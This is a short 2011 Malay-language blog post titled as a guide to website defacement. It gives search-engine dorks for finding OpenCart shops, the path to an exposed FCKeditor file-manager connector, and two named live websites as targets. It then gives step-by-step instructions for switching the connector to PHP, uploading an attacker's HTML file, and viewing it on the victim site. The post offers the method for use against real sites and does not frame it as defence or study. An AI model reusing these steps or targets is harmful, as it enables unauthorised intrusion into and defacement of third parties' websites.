Pages

Friday 26 August 2011

Cara deface menggunakan exploit

Dork :
:Powered bu Opencart site:.com
:SUPORT BY OPENCART



Exploit :
/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html


Fckeditor Web :
http://www.schoolshopper.com.au/
http://www.inputandanalysis.com/

Step by step :
Bukak Fckeditor web tu .
Lepas tu tambah exploit kat belakang fckeditor web tu .
http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Then korang ade nampak connector kat atas belah kirikan dan connector tu tulis ASP .
Tukar ASP tu kepada PHP.


Then choose file code html korang.


Upload file tu .

Kalau nak tahu sama ada file korang tu da upload ke belum . Nanti dia kuar macam ni .


Last sekali type balik fckeditor web tu . Tapi tambah /namafilecodehtmlkorang.html

Contoh : http://www.schoolshopper.com.au/silly13a13y.html



Try and Error oke .
Posted by -Silly|13a13y- at Friday, August 26, 2011

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)